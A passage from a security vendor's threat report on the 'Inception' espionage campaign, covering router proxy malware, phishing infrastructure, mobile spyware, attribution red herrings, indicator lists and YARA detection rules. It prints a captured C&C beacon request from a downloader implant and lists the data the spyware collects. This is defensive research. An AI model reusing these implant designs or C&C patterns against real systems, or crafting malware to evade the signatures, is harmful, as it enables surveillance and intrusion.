showed them to be internet -connected devices of various kinds. Many were 
Korean Tera- EP home routers; but there were several other products 
represented.  
  
 
  It is believed that the attackers  were able to compromise these devices based on 
poor configurati ons or default credentials.   
 We were able to do some forensic work on a compromised Tera- EP TE -800 
device and discovered another dimension of  the attacker’s infrastructure.   
  
 
28 Router malware  
 
Under the ramfs  mounted partition we found a stripped and statically linked 
MIPS -el binary named tail-.  Instances of this were also found under the running 
process list.   
  
tail- serves as a SOCKS proxy for the attackers.  Each sample of the binary we 
were able to acquire was configured with a unique 32byte blowfish key and a 
small, encrypted section appended to the end of the binary.   
 Upon executi on the binary uses its hardcoded key to decrypt the configur ation 
section and retrieve the listening port to use for in coming connections.  This acts 
as a management interface. From here the attackers can  request a specific port 
to be opened as one of the following types: SOCKET, SOCKSS, SOCKAT, SOCKS5, or STATUSPORT.   
 To prevent anyone else from accessing this service all comm unication on the 
management interface is encrypted using the same blowfish k ey.  This means 
that the attackers  must maintain a list of where each of these implants are 
installed, as w ell as what port and key each i s configured to use.  
 This setup makes it  difficult  to identify embedded devices compromised with this 
malware by scanning open ports.  
 In the wild we witnessed the attackers connect to the management port and 
request SOCKSS connections.  This would open the specified port a nd wait for 
configurat ion data, which consists of a domain name (webdav.cloudme.com), the 
destination port, and a variable length RC4 key, all of which encrypted using the blowfish key.   Once received the malware would attempt to connect to the domain name on the specified por t and would start tunneling all traffic received 
from the SOCKSS port to the destination and vise- versa. The communication 
between the attacker and the SOCKSS is encoded using the RC4 key.  The graphic below illustrates a typical session.  
 
 
29 Additional servers  
 
The router proxy network provides another layer of indirection masking the 
attackers’  infrastructure. However, because we captured traffic through  one of 
these embedded devices we could identify other parts of their operation.  
 We identified four  IP addresses that connected to the proxy malwar e: 
 
Cloud enumerator:  
Apparently a r ented server at AS34224 NETERRA -AS, Bulgaria  
 This host belongs to a Bulgarian VPS service and would use the router proxy to 
connect to webdav.cloudme.com . This host does all scanning of webdav shares 
for stolen user data, and also uploads new malware components.  
 
Health checker:  
Apparently a rented server at AS5577 ROOT root SA, Luxembourg.  
 This IP would make connections hourly and poll the status of the router proxy 
malware. This machine is most likely used to track which compromised routers are currently available for use.   
 
Unlocker:  
Apparently a rented server at AS52048 DATACLUB DataClub S.A. Latvia.  
 Traffic from this IP had  a very specific purpose: It unlocked routers for proxying in 
connection with the sending of phishing emails.  
 In the wild we observed this IP connect to our router on the malware 
management port and specify a SOCKSS proxy port to be opened. Immediately after, the newly opened port would be connected to by another IP and used to 
send phishing emails with malicious attachments.  
 
However, later we observed that the Email sender  IP at VOLIA vanished and the 
Unlocker server taking over its role as well.  
 
Email sender:  
An IP at AS25229 VOLIA -AS, Ukraine. Possibly a compromised host.  
 After a router SOCKSS port was opened by Unlocker , this IP would connect  to 
the opened port and tunnel its email traffic through the router.  
 
Each of these connect ions used the correct encryption key,  so we know that 
these accesses  came from the attackers and not some opportunistic third party.  
   
 
30 Mail proxies : 
 
Through  our router monitoring we identified t wo mail proxies  used by the 
attackers. We were later notified by Symantec (thanks , guys!) about a third. 
These servers were hosted on domains that were registered by the attackers , 
using domain names clearly meant to look legitimate.  This is the only time we 
have seen attackers register domains in this investigation.  
 The mail proxies  were:  
 
haarmannsi.cz  : Spoof of the legitimate domain haarmannsi.com  
sanygroup.co.uk  : Spoof of the legitimate domain sanygroup.com  
ecolines.es   : Spoof of the legitimate domain ecolines.net  
 
Registrant WHOIS  information seems  forged:  
 haarmannsi.cz  
name: Sanyi TERRAS 
address: R. FREI CANECA 1120  
SAO PAULO 
01307-003 
BR 
e-mail: sanyi_terras@outlook.com 
created: 12.06.2014 
NS:  ns*.frankdomains.com 
 
sanygroup.co.uk : 
name:  Alan 
address: Uddmansgatan 13 
Pitea 
Norrbottenalän 94471 SE 
created:  06.05.2014 NS:   ns*.domains4bitcoins.com 
 
ecolines.es:  
name:  Lyisa Almeida 
address: N/A 
created:  04.06.2014 
NS:  ns*.frankdomains.com 
 
.  
 
  
31 Observed phishing email s 
 
The connections made from the Ukrainian host  to the router  were interest ing. 
After being proxied though the router, each of these would authenticate with one of the dedicated mail  proxies  and send out phishing attacks.  
 From captured traffic it appears that the mail proxies have SOCKSv5 services 
running on obscure high port s. We have documented that the att ackers log in to 
these using apparently randomly generated usernames and passwords, a unique pair for each server . The mail proxy  would then relay  the spearphishing mail as 
seen below.  
 
 
Above: Captured SMTP session , sending the malicious attachment MQ1474.doc  
 
This way the attack  can be mistaken to come  from legitimate business es and 
trusted organizations.  In some  cases the organization from which the phishing 
email originates would appear to be a known associate to the target . 
  
 
32 The email shown above was one of a number of messages sent to targets in the 
oil industry. Investigating the target email addresses, we saw several of these were found in this public document from the World Petroleum Council, including some addresses that are, at the present  time, no longer valid.  
 And then, the ground shifted again.  
  
 
33  
PART I II:  
Attacks on mobile devices 
 
  
34 One of the spearphis hing mails we observed coming through the router network 
was this one, sent to an address under the gov.py (Government of Paraguay)  
domain.  
 
 
Get WhatsApp now for your iPhone, Android, BlackBerry or Windows Phone  
 
There was no executable attachment  in this  mail, but i nstead a link shortened by 
the URL shortener service bit .ly, with the underlying link point ing to an IP address 
on a Dutch hosting service.  Clicking that link from a Window s PC only yielded a 
redirection to the BBC homepages , and using other devices did not give more 
data.  
 
The bit. ly service does however provide information on  the user creating t he 
shortened link , and other links associated with this account.  In this case, the user 
was named nicolatesla53.  
  
 
35  
The nicolatesla53 bit.ly profile page  
 
The nicolatesla53 account was created in July 2014. From Oct 24th to Nov 21st 
this user created nearly 10000 shortened links –  we harvested 9990 unique 
ones. Three IP addresses were used for these links:  
 
82.221.100.55  
82.221.100.60  
94.102.50.60  
 The links themselves were on this format:  
 http://server_ip/page/index?id= target_ identifier &type2= action_ code  
 As far as we were able to tell, there were three main types of action _code:  
 743 : Serve malware disguised as WhatsApp updates  
1024  : Serve malware disguised as Viber updates  
other  : Serve MMS phishing content. The code identi fies mobile operator and 
determines which logo will be displayed when the user follows the link.  
  
 
36 MMS Phishing  
 
We have no sample of the actual MMS phishing messages apparently being sent, but we can see the page served when a user clicks a spammed link. This is  
just a dialogue box asking for the password presumably included in the initial 
message, and the next stage likely involves download of malicious content.  
  
 
The password screen for action code 16611 (TELE2)  
 We were in the middle of harvesting the servers for data on the various action 
codes  when they all were abruptly taken offline; so our data on which mobile 
operators are targeted  is not complete . We managed to get 66 of a total of 190. 
The ones we know of are shown below .  A full breakdown of m obile operators 
and related links is included in the appendix.  
 
  
37 The composition of links created for the various mobile operators is quite 
interesting, as one can speculate that they represent amount of actual or planned attacks in different countries. With the top three operators being Vodafone, T -
Mobile and Proximus (Belgacom) it seems these apparent phishing at tacks are 
less focused on the Russian sphere than t he previously discussed malware.  
 This map is not complete, though . It represents only about 35% (66/190) of all 
mobile operators targeted and 66% ( 3152/4781) of all phishing links we managed 
to harvest. In addition, some operators like Vodafone are global actors, so the map might show an unfair intensity in their HQ locations.  
  
 
MMS phis hing heat map 
 
 The rest of the bit.ly links used the action codes 743 or 1024. And now  things 
really get interesting. By using mobile device HT TP User -Agents we were able to 
trigger downloads of malware components  from some of these links.  
  
 
38 Mobile malwar e: Android 
 
 Accessing the link from an Android User -Agent initiated  a download of an 
Android installer package named WhatsAppUpdate.apk.  The package we 
analyzed was 1.2MB in size.  
 The apparent main purpose of this malware is to record phone call audio. Recordings are stored as *.mp4  files, and uploaded to the attackers periodically.  
 The malware is able to collect  a lot of other information, not all of which is 
actually used:  
 
• Accou nt data 
• Location  
• Contacts  
• External and Internal Storage (files written)  
• Audio (microphone)  
• Outgoing calls  
• Incoming calls  
• Call log  
• Calendar  
• Browser bookmarks  
• Incoming SMS  
 
Through the encrypted C&C protocol, the attackers can issue commands and binary upda tes to the malware.  
 It uses a custom DAO/Database scheme which use s accounts belonging to the 
virtual community Live Journal  (livejournal.com)  as data stores . Three such 
accounts were found hardcoded in the package:  
 
 
 The accounts all state that they  belong to Iranian users.  This is very likely false.  
 
 
39  
 
 The text in these posts starts first out in cleartext, but quickly turns into unreadable gibberish. The HTML  source code reveals that the encoded portion is 
encapsulated in  blog-index tags:  
 
 The three accounts contain different configuration blocks pointing to C&C servers 
apparently located in Poland, Germany and Russia, respectively. Based on registration data and folder configuration we believe these are legitimate but compromised Joomla ser vers.  
 And then a n unexpected oddity shows  up in the Java source:  
 
 
 The sign in front of SizeRandomStr is “Truti” - a Hindi word meaning “Error ”. 
    
 
40 We were also able to download a similar malware sample ( BrowserUpdate.apk ) 
from one of the C&C servers. This sample used different online accounts for its 
DAO/database functionality, but is otherwise quite similar to the first.  
        
 
41 Mobile malware: Apple IOS  
 
 Using an IOS User -Agent triggered the download of a Debian installer package, 
WhatsAppUpdate.deb, also 1.2Mb in size.  
 This application impersonates a Cydia installer,  and can only be installed on a 
jailbroken phone.  
  Once installed, it may collect  
 
• Device platform , name, model, system name, system version 
• ICCID 
• User’s address book  
• Roaming status  
• Phone number  
• Carrierbundlename  
• Iso co untry name  
• Carrier name  
• Wifi status  
• MAC  address  
• Device battery level  
• Free and total space  
• Cpu frequency  and count  
• Total and user memory  
• Maxsocketbuffersize  
• Language local identifier  and language display name  
• Default and local time zone 
• Account  data: AccountAvailableServiceT ypes , AccountK ind, 
AccountSocialE nabled , etc 
• AppleID  
• Credit DisplayS tring 
• DSPersonID  
• IOS specific data; ex  LastBackupComputerName, 
LastBackupComputerType, iTunes.store- UserName, iTunes.store-
downloaded- apps etc. 
 
  
42 These data are encrypted and uploaded to an FTP account which is taken from 
an encrypted configuration file named /usr/bin/cores . 
 
In this particular c ase, the FTP account is located on a legitimate (if struggling) 
hosting service in the UK.  
 In this case, there’s another clue:  
 
 
The project path in the package contains the name JohnClerk.  
 
The WhatsAppUpdate project seems derived from an earlier template named 
SkypeUpdate.  
 
  
43 Mobile malware: Blackb erry 
 
 By now, it came as no surprise  when we triggered a download with a BlackBerry 
User -Agent. The initial download was a Java Applications Descriptor, a text file 
designed for Over -The-Air installation of Java- based applications. This JAD file 
contained the locations of the two Blackberry *.COD binaries which we then could download directly.  
 The application impersonates a settings utility.  This collects:  
 
• deviceName, manufacturerName  
• platformVersion, softwareVersion  
• brandVendorId, brandVersion  
• total and free flash size of the device  
• amount of memory/storage already allocated  
• ownerName, ownerInformation  
• Phone mumber  
• PIN 
• IMSI 
• IMEI 
• mcc and mnc (Mobile Carrier ID)  
• cellID 
• Location area code  
• isPasswordEnabled  
• Battery data (level, temperature, voltage, etc)  
• Installed applications  
• Address book  
• APChannel  
• Connected Network Type  
• BSSID  
• DataRate  
• Profile Name  
• RadioBand  
• SecurityCategory  
• SignalLevel  
• SSID  
 Collected data will be uploaded to a DynDNS domain currently hosted on a US webhosting service.    
 
 
44  
 
“God_Save_The_Queen” is used as a reference in one of the  Blackberry  
binaries.  
 
Since these COD files are also compiled Java code, they are possible to decompile to original source code. In a similar fashion to the Android version, we find interes ting strings there. This time they are in Arabic:  
  
 
 “Reading files” in Arabic   
 
 
45  
 
PART I V:  
Attribution  
  
 
46 Timelines  and activity patterns 
 
The earliest sample of Inception- related malware we have been able to obtain, 
was submitted to us in June 2014. H owever, decoy document metadata show s 
that it was created late May . The related cloud account was created just before 
that. An examination of the other documents associated with the attacks show 
that they have been created at a steady pace all through summer and autumn 
2014 and attacks are still ongoing.  
 Of interest is also the attackers ’ activity patterns over the 24h cycle. The main 
upload of new components to shares seems to be divided over two high– activity  
periods:  6:00 -10:00 UTC and 17:00 -  21:00 UTC . No uploads were seen 
between 23:00 and 05:00 UTC.   
 It is however doubtful how indicative these timeframes are. To illustrate, we looked into another and more obscure timing factor: The timing of the AES InitVector random seeds. A random seed is the initial value passed into a 
pseudo- randomizer function. The malware uses the random output to create 
what is known as an InitVector -  a starting point for the AES 
encryption/decryption function.  
 The code used in some of the DLLs indicate that the attackers tend to use the C 
time() function to generate random seeds. This function returns values of granularity down to seconds. Thus random seeds, and ultimately the InitVectors, are functions of these quite coarse uni ts of time.  
 The encrypted files uploaded to the WebDAV shares come with their InitVectors stored at the end of the file. S ince we know the time window to be within a few 
days of the upload time we were able to brute force the time values that would generate the corresponding InitVectors. Thus, we were able to say to the second when the file was created –  and most times were identified to be in the range 
1500 - 2200 GMT . 
 Unfortunately, we had to reject these data.  The file creation times turned out to 
be hours after the files  themselves were uploaded to the WebDAV share. Either 
the attackers’ system clock is wrong or a fixed offset is added to the random seed. Either way, the data can’t be trusted; and shows that nothing can be taken at face value.  
  
 
47 The Chinese connection 
 On at least two occasions during our surveillance of the Inception framework, the malware downloaded something unexpected and wholly different from what we have discussed until now.  
 These files were downloaded as encrypted *.bin files from the accounts 
carter0648 and frogs6352. When decrypted, these turned out to be dropper 
packages containing one dropper executable clearly created for the Inception 
framework, and one other, very different executable.  
 This executable, (sccm.exe, md5 dd8790455109497d49c2fa2442cf16f7) is a classical Chinese APT implant. It is a downloader and remote shell program, designed to connect to a C&C server to interact with the attacker and/or download more malware.  
 
The C&C server in this case is ict32.msname.org.   
 
When connecting to this server, sccm.exe issues the following request:  
    
 
This C& C domain is used by many other malwares related to sccm.exe; some of 
which share obvious connections to the Quarian  malware family, a known APT 
intrusion tool.  
 This development was unexpected for several reasons. First of all, it apparently breaks the strict, obfuscatory operational security built into the Inception framework. Inception has the capacity to perform all steps needed for scouting out and exfiltrating data without resorting to traditional hosted command & control. By using a well -understood APT tool and a known malicious C&C 
domain name, the attackers permit much clearer attribution.   POST /check.jsp HTTP/1.1  
Accept: */*..Accept -Language:en- us 
Content -Type: application/octet -stream  
Accept -Encoding: gzip, deflate  
User -Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)  
Host: www.antivir.com  
Content -Length: 8  
Connection: Keep- Alive  
Cache- Control: no- cache  
 
 
48 Another factor which is out of character is the coding style. All Inception- related 
malware is written using Visual Studio 2010. The downloaded sccm.exe is written 
using Visual C++ 6; and has a PE header compile date of October 2010.  
This date can be forged, and indeed, all Inception- related malware has some 
level of for gery in the compile dates. However, the sccm.exe compile date 
matches the Quarian developer toolset and coding style to a better degree than 
the other files distributed through Inception.  
 Then there is the C&C domain used . According to DomainTools.com  the 
msname.org domain registration timed out September 27
th 2014. It was left 
inactive and was not renewed until Nov 12th. This means that the attackers 
distributed malware that would be out of action for a long time (last distribution of 
sccm.exe was Septemb er 26th).  
 
Because of all this we consider sccm.exe as an unreliable indicator. It is likely to 
be a red herring purposefully placed on shares where the attackers have seen signs of access by security researchers.  
  An odd indicator  
 At one instance the a ttackers seem to have slipped up. Instead of using their 
scheduled task, they apparently did something manually on a WebDAV share. This is visible because the request came from an apparent attacker IP, but used yet another User -Agent: “ gvfs/1.12.3”.    
 Gvfs is the virtual filesystem for Gnome desktop. The action on the account was 
abnormal as well; an apparent file upload:  
 
83.53.147.144 - - [02/Sep/2014:09:53:56 +0200] "PUT 
/tem5842/Documento%20sin%20t%C3%ADtulo HTTP/1.1" 408 0 "-" "gvfs/1.12.3" 
 
 “Documento sin título” means “ Untitled document ” in Spanish.  
 
When WebDAV shares are mapped up as drives by the operating system, any action taken by the attacker follows the same pattern as on the attacker’s local drive. In the case above, it seems the att acker attempted to edit a new 
document, which by default is given the name “Untitled document” in Gnome.  
 
This might indicate that the attacker’s operating system language is Spanish.  
Of course, Spanish is one of the world’s most widespread languages, so one cannot infer much from this. There is even a small possibility that the phenomenon is a pure artifact; for example that a Spanish- speaking researcher 
connected to the same account using the same Linux -based setup as the 
attackers.  
 
 
49 Similarities with Red October  
 
 This attack system shares a number of properties that are somewhat similar with the Red October campaigns detailed by Kaspersky Labs in 2013.  
For more information about this see:  
 
The "Red October" Campaign -  An Advanced Cyber Espionage Network 
Targeting Diplomatic and Government Agencies  
 
- Target  countries and verticals  overlap to some extent  
- The topics of some decoy documents are the same (eg. “Diplomatic Car for sale”)  
- Similar  overall loading architecture, with dropping of encrypted binaries 
that are later decrypted and loaded  
- Exploited documents contain certain similarities (i.e. the magic string “PT@T” used as a marker to locate the shellcode)  
  However, there are also clear differences.  The code is fully rewritten;  there 
appears to be little  code overlap, at least in the initial stage malware.  The coding 
style is different , with different solutions to programmatic problems, different use 
of exception handling, and different  use of C++ classes. It’s hard to believe that 
the same programmers are responsible for the two code  bases . 
 The Red October malware contained linguistic markers that pointed towards Russian speaking attackers. No such clues have been found  in the Inception-
related malware; there is a marked difference in the attention to detail and information leakage.  
 
It is certainly possible that the same people have organized both Inception and 
Red October , but there are no clear indications to this eff ect. 
 
 
50 Strings in malware  
 
 The Windows -based malware in this paper generally contains very few 
noticeable strings apart from what is commonly found in software, and clearly randomized strings. What exists – like the word “polymorphed” in the early DLL 
versions - is standard English with few discerning features.  
 This changes a bit when we look at the mobile malware. In the Android malware we find Hindi comments in the Java source code.  In the Iphone malware we find 
project paths referencing one “JohnClerk” , and a few typos like “conutry”. In one 
of the Blackberry binaries we find the string “God_Save_The_Queen” , a rather 
blunt hint towards Brit ain, as well as Arabic log strings.  
 These and other indicators have led us to conclude that the Inception attackers 
are setting a new standard for deliberate disinformation and red herrings in a malware espionage operation.  Some clues might have been added by accident, 
but none of these indicators  can be trusted in any way. Thus we are not going to 
assume anything about who might be behind these attacks . 
      
  
51 Conclusion  
 
 
The whole Inception setup shows signs of automation and seasoned 
programming.  The amount of layers used in this scheme to protect the payload 
of their attack seems excessively paranoid. Not only is the initial DLL apparently 
polymorphed using some backend tool –  the compile time stamps in the PE 
header are clearly forged,  resources  are removed so as not to give away any 
location information, and import tables are shuffled around, rendering import 
hashes (aka imphashes) useless.  
 The names of the files both when dropped and their original names along with the callback directories, paths and mutexes used all seem to be dynamically generated.  
 The attackers utilize compromised embedded devices  – typically routers - on the 
Internet as well as multiple dedicated hosting providers and VPN services to 
mask their identi ty from the cloud stor age provider  and others.  The same router 
botnet is used as a spreading and management platform for attacks on mobile devices as well.  
 This suggest s that this a large campaign and we’ve only seeing the beginning of 
it.  Initially many  of the targets were  located in Russia or related to Russia n 
interests , but as the campaign has evolved we have verified targets in countries 
all over the world.   
 It is clear that this infrastructure model does not need to be applied solely against a few targets, or even need to be hosted at CloudMe. The framework is generic, 
and will work as an attack platform for a multitude of purposes with very little modification.  
 The attribution indicators point in different directions and can’t be given  much 
weight. These attacks can i n theory be the creation of nation states or 
resourceful private entities -  we consider it very unlikely that they are performed 
by one or just a few individuals.  
     
© 201 4 Blue Coat Systems, Inc. All rights reserved.  Blue Coat, the Blue Coat logos, ProxySG, PacketShaper, CacheFlow, IntelligenceCenter, CacheEOS, CachePulse, Crossbeam, 
K9, the K9 logo, DRTR, Mach5, Packetwise, Policycenter, ProxyAV, ProxyClient, SGOs, WebPulse, Solera Networks, the Solera Net works logos, DeepSee, “See Everything. Know 
Everything.”, “Security  Empowers Business”, and BlueTouch are registered trademarks or trademarks of Blue Coat Systems, Inc. or its affiliates in the U.S. and certain other 
countries. This list may not be complete, and the absence of a trademark from this list does not mean it i s not a trademark of Blue Coat or that Blue Coat has stopped using the 
trademark.  All other trademarks mentioned in this document owned by third parties are the property of their respective owner s.  This document is for informational purposes 
only. Blue C oat makes no warranties, express, implied, or statutory, as to the information in this document.   
 
 
52 APPENDIX:  
 
Exploited RTF s ample  md5’s : 
 
0a0f5a4556c2a536ae7b81c14917ec98 
19ad782b0c58037b60351780b0f43e43 
20c2a4db77aabec46750878499c15354 
23d6fabda409d7fc570c2238c5487a90 3ff9c9e3228b630b8a68a05d6c3e396d 4624da84cae0f8b689169e24be8f7410 
4a4874fa5217a8523bf4d1954efb26ef 
4dcdc1110d87e91cda19801755d0bcf2 516a514bf744efb5e74839ddaf02a540 5e3ecfd7928822f67fbb3cd9c83be841 
685d9341228f18b0fd7373b7088e56a7 
822d842704596a2cf918863ea2116633 8488303c2a0065d9ac8b5fecf1cb4fc9 
8997d23b3d1bd96b596baee810333897 
8cd5974a49a9d6c49294312bf09f64ed 9738faf227bcd12bcab577a0fb58744d bc196dc8a14484e700169e1a78cf879e 
b453ec7fd92bee23846ff36bf903ddc0 
2fcbea8a344137421a86b046a6840265 
 
Dropped first -stage DLL’s  
 
0bd0fd3cbbcfddc4048228ce08ca26c2 
0bda50e05d575446de55d50c631afb53 
0f12614fa7a9bf7bcc951eec7b78658d 2f9ca7680ec0945455988d91d9b325f8 352da994d867eb68a178bb7f2fb672bc 
3a4a9d26c9c3c8d0fd697b036216319e 
43587e5fcf6770259026ec2ca6f41aa6 4628082e11c75b078ff0465523598040 
554d4c4da2e3603282b097b0e68ad11a 
670ac2e315088d22b2cb92acffc3e997 71bdd14cbc96badb79dfb0f23c52a9ee 72f020b564bc9771e7efe203881f5ef9 
80a7883c33a60b4c0178c9c8fb7d1440 
84fa976d9ed693668b3f97d991da0e97 89d851cbd2dc1988bb053235414f8928 a5aeda357ba30d87c1187b644baad8a0 
c3f2fb7840228924e5af17787e163e07 
d007616dd3b2d52c30c0ebb0937e21b4 d171db37ef28f42740644f4028bcf727 
d3886495935438f4a130d217d84ae8cb 
ea0d80db2075f789fc88c3fdf6e3d93e 
 
 
53 f2840be535fbaf8b15470d61967d527b 
90c93c9b80bbf31dce8434a565a0ec7b 
  
 
54 Downloaded  second- stage plugins:  
 
5c3de5b2762f4c5f91affaa6bcadd21b 
86b2372297619b1a9d8ad5acdf1a6467 
43112e09240caebb3c72855c9f6fc9e5 
 
 Downloaded Chinese malware, sccm.exe:  
 
dd8790455109497d49c2fa2442cf16f7 
 
 Router proxy malware:  
 
a6b2ce1cc02c902ba6374210faf786a3  
83b383884405190683d748f4a95f48d4 
62fc46151cfe1e57a8fa00065bde57b0 
036fbc5bffd664bc369b467f9874fac4 488e54526aa45a47f7974b4c84c1469a 24a9bbb0d4418d97d9050a3dd085a188 
b0c2466feb24519c133ee04748ff293f 
62dc87d1d6b99ae2818a34932877c0a4 7c6727b173086df15aa1ca15f1572b3f 
80528b1c4485eb1f4a306cff768151c5 
e1d51aa28159c25121476ffe5f2fc692 
 
 
Android malware:  
 
046a3e7c376ba4b6eb21846db9fc02df 
b0d1e42d342e56bc0d20627a7ef1f612 
 
 IOS malware (WhatsAppUpdate.deb):  
 
4e037e1e945e9ad4772430272512831c 
 
 Blackberry malware:  
 
0fb60461d67cd4008e55feceeda0ee71 
60dac48e555d139e29edaec41c85e2b4 
  
 
55 Verified malicious  CloudMe accounts (based on malware):  
 
garristone franko7046  
sanmorinostar  
tem5842  
bimm4276  
carter0648  
depp3353  frogs6352  
daw0996  
chak2488  
corn6814  
james9611  
lisa.walke r 
billder1405  droll5587  
samantha2064  
chloe7400  
browner8674935  
parker2339915  
young0498814  
hurris4124867  
  Likely malicious  CloudMe  accounts  (based on access patterns) : 
 adams2350  
adison8845  
allan1252  
altbrot  
amandarizweit  
anderson9357  
astanaforse  
baker6737  
bear9126  
bell0314  
betty.swon  
brown7169  
brown7356  
button8437  
carter0648  
carter3361  
clark6821  
collins2980  
cook2677  
cooper2999  
cooper7271  
cox7457  
cruz3540  
david.miller  
depp3353  
diaz1365  
din8864  
evans0198  
farrel0829  
ferrary2507  
ferre7053  
flores5975  
fox0485  frog0722  
gabriel.gonzalez  
garsia7871  
gray7631  
great2697  
green3287  
helen.scott  
helenarix  
hill5289  
jackson4996  
james9521  
john.thompson  
kalo3113  
kas2114  
kenneth.wilson king7460  
kol8184  
klauseroi  
ksjdkljeijd  
lariopas  
lopez9524  
lorrens6997  
martinez4502  
miller8350  
minesota1459  
moore6562  
moore7529  
morris9351  
morris9461  
murphy5975  
nedola7067  
nelson0000  
ninazer  norbinov  
nul7782  
parker0519  
poulokoel  
pourater  
red6039  
red6247  
reed6865  
roges2913  
roi5991  
ronald.campbell  
rosse2681  
samantares  
scott5008  
sebastianturne  
swon5826  
taylor9297  
tem5842  
thirt1353  
thomas9521 thomson3474  
turner3027  
vasabilas  
visteproi  
voldemarton  
wer8012 white3946  
william.moore  
wilson2821  
wilson2905  
wonder7165  
wrong8717
 
 
56 Bit.ly-shortened MMS p hishing links : 
 
Action Code  Operator  HQ location  Links created  
95501  Vodafone  UK 270 
81825  T-Mobile  Germany  213 
66968  Proximus  Belgium  197 
67840  China Mobile  China  173 
98491  Zain  Saudi Arabia  126 
58129  Mobilkom (A1 Telekom)  Austria  124 
12081  Orange  France  124 
24806  Hamrah -e-Avval  Iran 111 
41967  Mobilnil  Egypt  105 
46736  TeliaSonera  Sweden  100 
13911  Mobistar  Belgium  78 
65842  O2 UK, Germany  78 
70887  Telcomsel  Indonesia  74 
98455  Kcell  Kazakhstan  74 
94382  Mobilink  Pakistan  72 
12988  Airtel  India  65 
52378  Vodacom  South Africa  63 
99578  Maxis  Malaysia  59 
90298  Swisscom  Switzerland  59 
86791  Wind Mobile  Canada  56 
21522  MTN  South Africa  56 
26059  MTS  Russia  55 
67838  Alfa Lebanon  51 
96735  Kyivstar  Ukraine  51 
99753  T-Mobile  Germany  50 
24906  Omnitel  Lithuania  48 
17150  MtcTouch  Lebanon  43 
53272  Ooredoo  Qatar  36 
77008  BASE  Belgium  33 
31756  Djezzy  Algeria  29 
14269  Beeline  Russia  29 
76587  Omantel  Oman  28 
44974  Velcom  Belarus  27 
77849  E-plus Germany  26 
76102  Celcom  Malaysia  26 
31021  Azercell  Azerbaijan  24 
16611  TELE2  Sweden  24 
18675  Mobifone  Vietnam  22 
65942  T-Mobile  Germany  20 
85993  Sudatel  Sudan  20 
65090  Diallog  Belarus  19 
61384  Ufone  Pakistan  19 
11426  TMCell  Turkmenistan  19 
58043  Globe  Philippines  18 
70102  SingTel  Singapore  18 
90374  Avea  Turkey  18 
57464  DiGi  Malaysia  16 
77995  Megacom  Kyrgyzstan  15 
27964  Warid  Pakistan  11 
 
 
57 15029  DSTCom  Brunei  10 
70959  Smart  Cambodia  10 
83722  Asiacell  Iraq 10 
97143  Maroc Telecom  Morocco  9 
25786  Magti  Georgia  6 
34659  Geocell  Georgia  6 
56167  Bakcell  Azerbaijan  5 
42397  Dhiraagu  Maldives  5 
54375  Telfort  Netherlands  5 
43142  Banglalink  Bangladesh  2 
90128  EMT  Estonia  2 
24709  MTNL  India  2 
92444  Safaricom  Kenya  2 
60354  Plus Poland  2 
84899  Sabafon  Yemen  2 
14115  Sri Lanka Telecom  Sri Lanka  1 
42758  Lycamobile  UK 1 
 
  
58 Undetermined MMS phishing action  codes  (code, number of links):  
 
13975  320 54780  12 14659  3 19343  1 
51557  119 92529  11 16814  3 20732  1 
37020  88 61135  10 20247  3 25938  1 
11111  71 89838  10 24037  3 26346  1 
61925  64 44638  9 27307  3 26842  1 
91130  63 60007  9 31785  3 27758  1 
91200  58 67648  9 37629  3 30053  1 
79711  47 72371  9 49284  3 36962  1 
43312  42 96565  9 54512  3 37477  1 
75687  37 99094  9 68798  3 37686  1 
81544  37 24483  8 79286  3 38686  1 
51949  29 46127  8 85076  3 40606  1 
23562  28 55223  8 94046  3 42067  1 
96780  25 99061  7 11468  2 50935  1 
72026  24 20470  6 20460  2 52833  1 
78098  23 22798  6 25559  2 55991  1 
96878  20 32331  6 41075  2 59635  1 
18986  19 40772  6 45834  2 65025  1 
21782  19 52741  6 57403  2 65414  1 
57673  18 63095  6 65855  2 66185  1 
62088  18 70610  6 71103  2 67120  1 
37267  16 92826  6 71633  2 74336  1 
40019  16 25387  5 75778  2 74800  1 
46681  15 69153  5 77776  2 75906  1 
47390  15 72564  5 80209  2 89027  1 
22775  14 24122  4 91062  2 89675  1 
80998  14 47240  4 91212  2 90962  1 
98758  14 76002  4 91869  2 91774  1 
36942  13 82852  4 13335  1 94776  1 
93620  13 83478  4 15318  1 98886  1 
97276  13 97561  4 16155  1 
     
 
59 Attacker -owned domains :  
 
haarmannsi.cz  
sanygroup.co.uk  
ecolines.es  
blackberry -support.herokuapp.com  (DynDNS)  
    
 
60 YARA detection rules : 
 
rule InceptionDLL  
{ 
 meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
  $a = "dll.polymorphed.dll" 
$b = {83 7d 08 00 0f 84 cf 00 00 00 83 7d 0c 00 0f 84 c5 00 
00 00 83 7d 10 00 0f 84 bb 00 00 00 83 7d 14 08 0f 82 b1 00 
00 00 c7 45 fc 00 00 00 00 8b 45 10 89 45 dc 68 00 00} 
$c = {FF 15 ?? ?? ?? ?? 8B 4D 08 8B 11 C7 42 14 00 00 00 00 
8B 45 08 8B 08 8B 55 14 89 51 18 8B 45 08 8B 08 8B 55 0C 89 51 1C 8B 45 08 8B 08 8B 55 10 89 51 20 8B 45 08 8B 08} $d = {68 10 27 00 00 FF 15 ?? ?? ?? ?? 83 7D CC 0A 0F 8D 47 
01 00 00 83 7D D0 00 0F 85 3D 01 00 00 6A 20 6A 00 8D 4D D4 
51 E8 ?? ?? ?? ?? 83 C4 0C 8B 55 08 89 55 E8 C7 45 D8}   
$e = {55 8B EC 8B 45 08 8B 88 AC 23 03 00 51 8B 55 0C 52 8B 45 0C 8B 48 04 FF D1 83 C4 08 8B 55 08 8B 82 14 BB 03 00 50 8B 4D 0C 51 8B 55 0C 8B 42 04} 
 condition: 
  any of them 
} 
  
rule InceptionRTF { 
 meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
  $a = "}}PT@T" 
  $b = "XMLVERSION \ "3.1.11.5604.5606" 
  $c = "objclass Word.Document.12}\ \objw9355" 
 condition: 
  all of them 
} 
 
 
rule InceptionMips { 
 meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
  $a = "start_sockat" ascii wide 
      $b = "start_sockss" ascii wide 
  $c = "13CStatusServer" ascii wide 
 condition: 
      all of them 
} 
   
 
61 rule InceptionVBS { 
 meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
